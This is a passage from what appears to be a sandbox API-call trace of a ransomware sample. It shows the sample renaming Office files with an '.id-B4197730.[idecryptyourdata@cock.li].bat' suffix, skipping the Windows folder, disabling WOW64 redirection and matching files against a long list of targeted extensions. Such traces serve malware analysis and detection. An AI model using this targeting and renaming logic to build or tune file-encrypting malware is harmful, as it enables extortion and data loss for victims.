dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0176.888] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR8B.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir8b.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.888] CloseHandle (hObject=0x52c) returned 1 [0176.888] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0176.889] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0176.889] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR8F.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir8f.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.889] CloseHandle (hObject=0x52c) returned 1 [0176.890] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0176.890] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0176.890] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR9B.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir9b.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.987] CloseHandle (hObject=0x52c) returned 1 [0177.322] SetFilePointerEx (in: hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0177.322] SetFilePointerEx (in: hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0177.322] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\TelemetryDashboard.xltx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\telemetrydashboard.xltx.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0177.676] CloseHandle (hObject=0x534) returned 1 [0178.767] SetFilePointerEx (in: hFile=0x2dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0178.767] SetFilePointerEx (in: hFile=0x2dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0178.767] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Cartridges\\sqlpdw.xsl.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\cartridges\\sqlpdw.xsl.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0178.767] CloseHandle (hObject=0x2dc) returned 1 [0178.768] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x703398 | out: hHeap=0x6a0000) returned 1 [0178.768] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x73b4d8 | out: hHeap=0x6a0000) returned 1 [0178.768] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x3e20988 | out: hHeap=0x6a0000) returned 1 [0178.768] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x3e30990 | out: hHeap=0x6a0000) returned 1 [0178.769] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x43b0020 | out: hHeap=0x6a0000) returned 1 [0178.772] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x703410 | out: hHeap=0x6a0000) returned 1 [0178.772] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x456ccd0 [0178.772] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x456ccd0, Size=0x20) returned 0x458c290 [0178.772] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x456ca00 [0178.772] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x456ca00, Size=0x20) returned 0x458c240 [0178.772] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x77050000 [0178.772] GetProcAddress (hModule=0x77050000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x77066b30 [0178.773] Wow64DisableWow64FsRedirection (in: OldValue=0x39fff50 | out: OldValue=0x39fff50*=0x1) returned 1 [0178.773] lstrlenW (lpString="kernel32.dll") returned 12 [0178.773] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x458c240 | out: hHeap=0x6a0000) returned 1 [0178.773] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0178.773] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x458c290 | out: hHeap=0x6a0000) returned 1 Thread: id = 51 os_tid = 0xe98 [0155.220] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfffe) returned 0x44c0048 [0155.221] lstrlenW (lpString="C:") returned 2 [0155.221] FindFirstFileW (in: lpFileName="C:\\*", lpFindFileData=0x3b3fcf8 | out: lpFindFileData=0x3b3fcf8*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xf0b4f277, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0x9b28dcfd, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x9b28dcfd, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77850000, dwReserved1=0x0, cFileName="$GetCurrent", cAlternateFileName="$GETCU~1")) returned 0x6ba170 [0155.258] lstrlenW (lpString="C:\\$GetCurrent") returned 14 [0155.259] lstrcmpiW (lpString1="C:\\WINDOWS", lpString2="C:\\$GetCurrent") returned 1 [0155.259] lstrlenW (lpString="$GetCurrent") returned 11 [0155.259] lstrcmpiW (lpString1="C:\\WINDOWS", lpString2="$GetCurrent") returned 1 [0155.259] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfffe) returned 0x44d0050 [0155.259] lstrlenW (lpString="C:\\$GetCurrent") returned 14 [0155.259] FindFirstFileW (in: lpFileName="C:\\$GetCurrent\\*", lpFindFileData=0x3b3fa7c | out: lpFindFileData=0x3b3fa7c*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xf0b4f277, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0x9b28dcfd, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x9b28dcfd, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName=".", cAlternateFileName="")) returned 0x6ba1b0 [0155.259] FindNextFileW (in: hFindFile=0x6ba1b0, lpFindFileData=0x3b3fa7c | out: lpFindFileData=0x3b3fa7c*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xf0b4f277, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0x9b28dcfd, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x9b28dcfd, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="..", cAlternateFileName="")) returned 1 [0155.259] FindNextFileW (in: hFindFile=0x6ba1b0, lpFindFileData=0x3b3fa7c | out: lpFindFileData=0x3b3fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x542c8aac, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x973abb0f, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x9c5a0a89, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Logs", cAlternateFileName="")) returned 1 [0155.259] lstrlenW (lpString="C:\\$GetCurrent\\Logs") returned 19 [0155.260] lstrcmpiW (lpString1="C:\\WINDOWS", lpString2="C:\\$GetCurrent\\Logs") returned 1 [0155.260] lstrlenW (lpString="Logs") returned 4 [0155.260] lstrcmpiW (lpString1="C:\\WINDOWS", lpString2="Logs") returned -1 [0155.260] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfffe) returned 0x44e1060 [0155.260] lstrlenW (lpString="C:\\$GetCurrent\\Logs") returned 19 [0155.260] FindFirstFileW (in: lpFileName="C:\\$GetCurrent\\Logs\\*", lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x542c8aac, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x973abb0f, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x9c5a0a89, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffe727, dwReserved1=0x3f1, cFileName=".", cAlternateFileName="")) returned 0x6ba1f0 [0155.261] FindNextFileW (in: hFindFile=0x6ba1f0, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x542c8aac, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x973abb0f, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x9c5a0a89, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffe727, dwReserved1=0x3f1, cFileName="..", cAlternateFileName="")) returned 1 [0155.261] FindNextFileW (in: hFindFile=0x6ba1f0, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfd21ec45, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd21ec45, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd26b034, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0xa7de, dwReserved0=0xffffe727, dwReserved1=0x3f1, cFileName="downlevel_2017_09_07_02_02_39_766.log.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="DOWNLE~1.BAT")) returned 1 [0155.261] lstrlenW (lpString="downlevel_2017_09_07_02_02_39_766.log.id-B4197730.[idecryptyourdata@cock.li].bat") returned 80 [0155.261] lstrlenW (lpString=".1cd") returned 4 [0155.261] lstrcmpiW (lpString1=".1cd", lpString2=".bat") returned -1 [0155.261] lstrlenW (lpString=".3ds") returned 4 [0155.261] lstrcmpiW (lpString1=".3ds", lpString2=".bat") returned -1 [0155.261] lstrlenW (lpString=".3fr") returned 4 [0155.261] lstrcmpiW (lpString1=".3fr", lpString2=".bat") returned -1 [0155.261] lstrlenW (lpString=".3g2") returned 4 [0155.261] lstrcmpiW (lpString1=".3g2", lpString2=".bat") returned -1 [0155.261] lstrlenW (lpString=".3gp") returned 4 [0155.261] lstrcmpiW (lpString1=".3gp", lpString2=".bat") returned -1 [0155.261] lstrlenW (lpString=".7z") returned 3 [0155.262] lstrcmpiW (lpString1=".7z", lpString2="bat") returned -1 [0155.262] lstrlenW (lpString=".accda") returned 6 [0155.262] lstrcmpiW (lpString1=".accda", lpString2="i].bat") returned -1 [0155.262] lstrlenW (lpString=".accdb") returned 6 [0155.262] lstrcmpiW (lpString1=".accdb", lpString2="i].bat") returned -1 [0155.262] lstrlenW (lpString=".accdc") returned 6 [0155.262] lstrcmpiW (lpString1=".accdc", lpString2="i].bat") returned -1 [0155.262] lstrlenW (lpString=".accde") returned 6 [0155.262] lstrcmpiW (lpString1=".accde", lpString2="i].bat") returned -1 [0155.262] lstrlenW (lpString=".accdt") returned 6 [0155.262] lstrcmpiW (lpString1=".accdt", lpString2="i].bat") returned -1 [0155.262] lstrlenW (lpString=".accdw") returned 6 [0155.262] lstrcmpiW (lpString1=".accdw", lpString2="i].bat") returned -1 [0155.262] lstrlenW (lpString=".adb") returned 4 [0155.262] lstrcmpiW (lpString1=".adb", lpString2=".bat") returned -1 [0155.262] lstrlenW (lpString=".adp") returned 4 [0155.262] lstrcmpiW (lpString1=".adp", lpString2=".bat") returned -1 [0155.262] lstrlenW (lpString=".ai") returned 3 [0155.262] lstrcmpiW (lpString1=".ai", lpString2="bat") returned -1 [0155.262] lstrlenW (lpString=".ai3") returned 4 [0155.262] lstrcmpiW (lpString1=".ai3", lpString2=".bat") returned -1 [0155.262] lstrlenW (lpString=".ai4") returned 4 [0155.262] lstrcmpiW (lpString1=".ai4", lpString2=".bat") returned -1 [0155.262] lstrlenW (lpString=".ai5") returned 4 [0155.262] lstrcmpiW (lpString1=".ai5", lpString2=".bat") returned -1 [0155.262] lstrlenW (lpString=".ai6") returned 4 [0155.262] lstrcmpiW (lpString1=".ai6", lpString2=".bat") returned -1 [0155.262] lstrlenW (lpString=".ai7") returned 4 [0155.262] lstrcmpiW (lpString1=".ai7", lpString2=".bat") returned -1 [0155.262] lstrlenW (lpString=".ai8") returned 4 [0155.262] lstrcmpiW (lpString1=".ai8", lpString2=".bat") returned -1 [0155.262] lstrlenW (lpString=".anim") returned 5 [0155.262] lstrcmpiW (lpString1=".anim", lpString2="].bat") returned -1 [0155.263] lstrlenW (lpString=".arw") returned 4 [0155.263] lstrcmpiW (lpString1=".arw", lpString2=".bat") returned -1 [0155.263] lstrlenW (lpString=".as") returned 3 [0155.263] lstrcmpiW (lpString1=".as", lpString2="bat") returned -1 [0155.263] lstrlenW (lpString=".asa") returned 4 [0155.263] lstrcmpiW (lpString1=".asa", lpString2=".bat") returned -1 [0155.263] lstrlenW (lpString=".asc") returned 4 [0155.263] lstrcmpiW (lpString1=".asc", lpString2=".bat") returned -1 [0155.263] lstrlenW (lpString=".ascx") returned 5 [0155.263] lstrcmpiW (lpString1=".ascx", lpString2="].bat") returned -1 [0155.263] lstrlenW (lpString=".asm") returned 4 [0155.263] lstrcmpiW (lpString1=".asm", lpString2=".bat") returned -1 [0155.263] lstrlenW (lpString=".asmx") returned 5 [0155.263] lstrcmpiW (lpString1=".asmx", lpString2="].bat") returned -1 [0155.263] lstrlenW (lpString=".asp") returned 4 [0155.263] lstrcmpiW (lpString1=".asp", lpString2=".bat") returned -1 [0155.263] lstrlenW (lpString=".aspx") returned 5 [0155.263] lstrcmpiW (lpString1=".aspx", lpString2="].bat") returned -1 [0155.263] lstrlenW (lpString=".asr") returned 4 [0155.263] lstrcmpiW (lpString1=".asr", lpString2=".bat") returned -1 [0155.263] lstrlenW (lpString=".asx") returned 4 [0155.263] lstrcmpiW (lpString1=".asx", lpString2=".bat") returned -1 [0155.263] lstrlenW (lpString=".avi") returned 4 [0155.263] lstrcmpiW (lpString1=".avi", lpString2=".bat") returned -1 [0155.263] lstrlenW (lpString=".avs") returned 4 [0155.263] lstrcmpiW (lpString1=".avs", lpString2=".bat") returned -1 [0155.263] lstrlenW (lpString=".backup") returned 7 [0155.263] lstrcmpiW (lpString1=".backup", lpString2="li].bat") returned -1 [0155.263] lstrlenW (lpString=".bak") returned 4 [0155.263] lstrcmpiW (lpString1=".bak", lpString2=".bat") returned -1 [0155.263] lstrlenW (lpString=".bay") returned 4 [0155.263] lstrcmpiW (lpString1=".bay", lpString2=".bat") returned 1 [0155.263] lstrlenW (lpString=".bd") returned 3 [0155.263] lstrcmpiW (lpString1=".bd", lpString2="bat") returned -1 [0155.263] lstrlenW (lpString=".bin") returned 4 [0155.263] lstrcmpiW (lpString1=".bin", lpString2=".bat") returned 1 [0155.263] lstrlenW (lpString=".bmp") returned 4 [0155.264] lstrcmpiW (lpString1=".bmp", lpString2=".bat") returned 1 [0155.264] lstrlenW (lpString=".bz2") returned 4 [0155.264] lstrcmpiW (lpString1=".bz2", lpString2=".bat") returned 1 [0155.264] lstrlenW (lpString=".c") returned 2 [0155.264] lstrcmpiW (lpString1=".c", lpString2="at") returned -1 [0155.264] lstrlenW (lpString=".cdr") returned 4 [0155.264] lstrcmpiW (lpString1=".cdr", lpString2=".bat") returned 1 [0155.264] lstrlenW (lpString=".cer") returned 4 [0155.264] lstrcmpiW (lpString1=".cer", lpString2=".bat") returned 1 [0155.264] lstrlenW (lpString=".cf") returned 3 [0155.264] lstrcmpiW (lpString1=".cf", lpString2="bat") returned -1 [0155.264] lstrlenW (lpString=".cfc") returned 4 [0155.264] lstrcmpiW (lpString1=".cfc", lpString2=".bat") returned 1 [0155.264] lstrlenW (lpString=".cfm") returned 4 [0155.264] lstrcmpiW (lpString1=".cfm", lpString2=".bat") returned 1 [0155.264] lstrlenW (lpString=".cfml") returned 5 [0155.264] lstrcmpiW (lpString1=".cfml", lpString2="].bat") returned -1 [0155.264] lstrlenW (lpString=".cfu") returned 4 [0155.264] lstrcmpiW (lpString1=".cfu", lpString2=".bat") returned 1 [0155.264] lstrlenW (lpString=".chm") returned 4 [0155.264] lstrcmpiW (lpString1=".chm", lpString2=".bat") returned 1 [0155.264] lstrlenW (lpString=".cin") returned 4 [0155.264] lstrcmpiW (lpString1=".cin", lpString2=".bat") returned 1 [0155.264] lstrlenW (lpString=".class") returned 6 [0155.264] lstrcmpiW (lpString1=".class", lpString2="i].bat") returned -1 [0155.264] lstrlenW (lpString=".clx") returned 4 [0155.264] lstrcmpiW (lpString1=".clx", lpString2=".bat") returned 1 [0155.264] lstrlenW (lpString=".config") returned 7 [0155.264] lstrcmpiW (lpString1=".config", lpString2="li].bat") returned -1 [0155.264] lstrlenW (lpString=".cpp") returned 4 [0155.264] lstrcmpiW (lpString1=".cpp", lpString2=".bat") returned 1 [0155.264] lstrlenW (lpString=".cr2") returned 4 [0155.264] lstrcmpiW (lpString1=".cr2", lpString2=".bat") returned 1 [0155.264] lstrlenW (lpString=".crt") returned 4 [0155.264] lstrcmpiW (lpString1=".crt", lpString2=".bat") returned 1 [0155.264] lstrlenW (lpString=".crw") returned 4 [0155.265] lstrcmpiW (lpString1=".crw", lpString2=".bat") returned 1 [0155.265] lstrlenW (lpString=".cs") returned 3 [0155.265] lstrcmpiW (lpString1=".cs", lpString2="bat") returned -1 [0155.265] lstrlenW (lpString=".css") returned 4 [0155.265] lstrcmpiW (lpString1=".css", lpString2=".bat") returned 1 [0155.265] lstrlenW (lpString=".csv") returned 4 [0155.265] lstrcmpiW (lpString1=".csv", lpString2=".bat") returned 1 [0155.265] lstrlenW (lpString=".cub") returned 4 [0155.265] lstrcmpiW (lpString1=".cub", lpString2=".bat") returned 1 [0155.265] lstrlenW (lpString=".dae") returned 4 [0155.265] lstrcmpiW (lpString1=".dae", lpString2=".bat") returned 1 [0155.265] lstrlenW (lpString=".dat") returned 4 [0155.265] lstrcmpiW (lpString1=".dat", lpString2=".bat") returned 1 [0155.265] lstrlenW (lpString=".db") returned 3 [0155.265] lstrcmpiW (lpString1=".db", lpString2="bat") returned -1 [0155.265] lstrlenW (lpString=".dbf") returned 4 [0155.265] lstrcmpiW (lpString1=".dbf", lpString2=".bat") returned 1 [0155.265] lstrlenW (lpString=".dbx") returned 4 [0155.265] lstrcmpiW (lpString1=".dbx", lpString2=".bat") returned 1 [0155.265] lstrlenW (lpString=".dc3") returned 4 [0155.265] lstrcmpiW (lpString1=".dc3", lpString2=".bat") returned 1 [0155.265] lstrlenW (lpString=".dcm") returned 4 [0155.265] lstrcmpiW (lpString1=".dcm", lpString2=".bat") returned 1 [0155.265] lstrlenW (lpString=".dcr") returned 4 [0155.265] lstrcmpiW (lpString1=".dcr", lpString2=".bat") returned 1 [0155.265] lstrlenW (lpString=".der") returned 4 [0155.265] lstrcmpiW (lpString1=".der", lpString2=".bat") returned 1 [0155.265] lstrlenW (lpString=".dib") returned 4 [0155.265] lstrcmpiW (lpString1=".dib", lpString2=".bat") returned 1 [0155.265] lstrlenW (lpString=".dic") returned 4 [0155.265] lstrcmpiW (lpString1=".dic", lpString2=".bat") returned 1 [0155.265] lstrlenW (lpString=".dif") returned 4 [0155.266] lstrcmpiW (lpString1=".dif", lpString2=".bat") returned 1 [0155.266] lstrlenW (lpString=".divx") returned 5 [0155.266] lstrcmpiW (lpString1=".divx", lpString2="].bat") returned -1 [0155.266] lstrlenW (lpString=".djvu") returned 5 [0155.266] lstrcmpiW (lpString1=".djvu", lpString2="].bat") returned -1 [0155.266] lstrlenW (lpString=".dng") returned 4 [0155.266] lstrcmpiW (lpString1=".dng", lpString2=".bat") returned 1 [0155.266] lstrlenW (lpString=".doc") returned 4 [0155.266] lstrcmpiW (lpString1=".doc", lpString2=".bat") returned 1 [0155.266] lstrlenW (lpString=".docm") returned 5 [0155.266] lstrcmpiW (lpString1=".docm", lpString2="].bat") returned -1 [0155.266] lstrlenW (lpString=".docx") returned 5 [0155.267] lstrcmpiW (lpString1=".docx", lpString2="].bat") returned -1 [0155.267] lstrlenW (lpString=".dot") returned 4 [0155.267] lstrcmpiW (lpString1=".dot", lpString2=".bat") returned 1 [0155.267] lstrlenW (lpString=".dotm") returned 5 [0155.267] lstrcmpiW (lpString1=".dotm", lpString2="].bat") returned -1 [0155.267] lstrlenW (lpString=".dotx") returned 5 [0155.267] lstrcmpiW (lpString1=".dotx", lpString2="].bat") returned -1 [0155.267] lstrlenW (lpString=".dpx") returned 4 [0155.267] lstrcmpiW (lpString1=".dpx", lpString2=".bat") returned 1 [0155.267] lstrlenW (lpString=".dqy") returned 4 [0155.267] lstrcmpiW (lpString1=".dqy", lpString2=".bat") returned 1 [0155.267] lstrlenW (lpString=".dsn") returned 4 [0155.267] lstrcmpiW (lpString1=".dsn", lpString2=".bat") returned 1 [0155.267] lstrlenW (lpString=".dt") returned 3 [0155.267] lstrcmpiW (lpString1=".dt", lpString2="bat") returned -1 [0155.267] lstrlenW (lpString=".dtd") returned 4 [0155.267] lstrcmpiW (lpString1=".dtd", lpString2=".bat") returned 1 [0155.267] lstrlenW (lpString=".dwg") returned 4 [0155.267] lstrcmpiW (lpString1=".dwg", lpString2=".bat") returned 1 [0155.267] lstrlenW (lpString=".dwt") returned 4 [0155.267] lstrcmpiW (lpString1=".dwt", lpString2=".bat") returned 1 [0155.267] lstrlenW (lpString=".dx") returned 3 [0155.267] lstrcmpiW (lpString1=".dx", lpString2="bat") returned -1 [0155.267] lstrlenW (lpString=".dxf") returned 4 [0155.267] lstrcmpiW (lpString1=".dxf", lpString2=".bat") returned 1 [0155.267] lstrlenW (lpString=".edml") returned 5 [0155.267] lstrcmpiW (lpString1=".edml", lpString2="].bat") returned -1 [0155.267] lstrlenW (lpString=".efd") returned 4 [0155.267] lstrcmpiW (lpString1=".efd", lpString2=".bat") returned 1 [0155.267] lstrlenW (lpString=".elf") returned 4 [0155.267] lstrcmpiW (lpString1=".elf", lpString2=".bat") returned 1 [0155.268] lstrlenW (lpString=".emf") returned 4 [0155.268] lstrcmpiW (lpString1=".emf", lpString2=".bat") returned 1 [0155.268] lstrlenW (lpString=".emz") returned 4 [0155.268] lstrcmpiW (lpString1=".emz", lpString2=".bat") returned 1 [0155.268] lstrlenW (lpString=".epf") returned 4 [0155.268] lstrcmpiW (lpString1=".epf", lpString2=".bat") returned 1 [0155.268] lstrlenW (lpString=".eps") returned 4 [0155.268] lstrcmpiW (lpString1=".eps", lpString2=".bat") returned 1 [0155.268] lstrlenW (lpString=".epsf") returned 5 [0155.268] lstrcmpiW (lpString1=".epsf", lpString2="].bat") returned -1 [0155.268] lstrlenW (lpString=".epsp") returned 5 [0155.268] lstrcmpiW (lpString1=".epsp", lpString2="].bat") returned -1 [0155.268] lstrlenW (lpString=".erf") returned 4 [0155.268] lstrcmpiW (lpString1=".erf", lpString2=".bat") returned 1 [0155.268] lstrlenW (lpString=".exr") returned 4 [0155.268] lstrcmpiW (lpString1=".exr", lpString2=".bat") returned 1 [0155.268] lstrlenW (lpString=".f4v") returned 4 [0155.268] lstrcmpiW (lpString1=".f4v", lpString2=".bat") returned 1 [0155.268] lstrlenW (lpString=".fido") returned 5 [0155.268] lstrcmpiW (lpString1=".fido", lpString2="].bat") returned -1 [0155.268] lstrlenW (lpString=".flm") returned 4 [0155.268] lstrcmpiW (lpString1=".flm", lpString2=".bat") returned 1 [0155.268] lstrlenW (lpString=".flv") returned 4 [0155.268] lstrcmpiW (lpString1=".flv", lpString2=".bat") returned 1 [0155.268] lstrlenW (lpString=".frm") returned 4 [0155.268] lstrcmpiW (lpString1=".frm", lpString2=".bat") returned 1 [0155.268] lstrlenW (lpString=".fxg") returned 4 [0155.268] lstrcmpiW (lpString1=".fxg", lpString2=".bat") returned 1 [0155.268] lstrlenW (lpString=".geo") returned 4 [0155.268] lstrcmpiW (lpString1=".geo", lpString2=".bat") returned 1 [0155.268] lstrlenW (lpString=".gif") returned 4 [0155.268] lstrcmpiW (lpString1=".gif", lpString2=".bat") returned 1 [0155.268] lstrlenW (lpString=".grs") returned 4 [0155.269] lstrcmpiW (lpString1=".grs", lpString2=".bat") returned 1 [0155.269] lstrlenW (lpString=".gz") returned 3 [0155.269] lstrcmpiW (lpString1=".gz", lpString2="bat") returned -1 [0155.269] lstrlenW (lpString=".h") returned 2 [0155.269] lstrcmpiW (lpString1=".h", lpString2="at") returned -1 [0155.269] lstrlenW (lpString=".hdr") returned 4 [0155.269] lstrcmpiW (lpString1=".hdr", lpString2=".bat") returned 1 [0155.269] lstrlenW (lpString=".hpp") returned 4 [0155.269] lstrcmpiW (lpString1=".hpp", lpString2=".bat") returned 1 [0155.269] lstrlenW (lpString=".hta") returned 4 [0155.269] lstrcmpiW (lpString1=".hta", lpString2=".bat") returned 1 [0155.269] lstrlenW (lpString=".htc") returned 4 [0155.269] lstrcmpiW (lpString1=".htc", lpString2=".bat") returned 1 [0155.269] lstrlenW (lpString=".htm") returned 4 [0155.269] lstrcmpiW (lpString1=".htm", lpString2=".bat") returned 1 [0155.269] lstrlenW (lpString=".html") returned 5 [0155.269] lstrcmpiW (lpString1=".html", lpString2="].bat") returned -1 [0155.269] lstrlenW (lpString=".icb") returned 4 [0155.269] lstrcmpiW (lpString1=".icb", lpString2=".bat") returned 1 [0155.269] lstrlenW (lpString=".ics") returned 4 [0155.269] lstrcmpiW (lpString1=".ics", lpString2=".bat") returned 1 [0155.269] lstrlenW (lpString=".iff") returned 4 [0155.269] lstrcmpiW (lpString1=".iff", lpString2=".bat") returned 1 [0155.269] lstrlenW (lpString=".inc") returned 4 [0155.269] lstrcmpiW (lpString1=".inc", lpString2=".bat") returned 1 [0155.269] lstrlenW (lpString=".indd") returned 5 [0155.269] lstrcmpiW (lpString1=".indd", lpString2="].bat") returned -1 [0155.269] lstrlenW (lpString=".ini") returned 4 [0155.269] lstrcmpiW (lpString1=".ini", lpString2=".bat") returned 1 [0155.269] lstrlenW (lpString=".iqy") returned 4 [0155.269] lstrcmpiW (lpString1=".iqy", lpString2=".bat") returned 1 [0155.270] lstrlenW (lpString=".j2c") returned 4 [0155.270] lstrcmpiW (lpString1=".j2c", lpString2=".bat") returned 1 [0155.270] lstrlenW (lpString=".j2k") returned 4 [0155.270] lstrcmpiW (lpString1=".j2k", lpString2=".bat") returned 1 [0155.270] lstrlenW (lpString=".java") returned 5 [0155.270] lstrcmpiW (lpString1=".java", lpString2="].bat") returned -1 [0155.270] lstrlenW (lpString=".jp2") returned 4 [0155.270] lstrcmpiW (lpString1=".jp2", lpString2=".bat") returned 1 [0155.270] lstrlenW (lpString=".jpc") returned 4 [0155.270] lstrcmpiW (lpString1=".jpc", lpString2=".bat") returned 1 [0155.270] lstrlenW (lpString=".jpe") returned 4 [0155.270] lstrcmpiW (lpString1=".jpe", lpString2=".bat") returned 1 [0155.270] lstrlenW (lpString=".jpeg") returned 5 [0155.270] lstrcmpiW 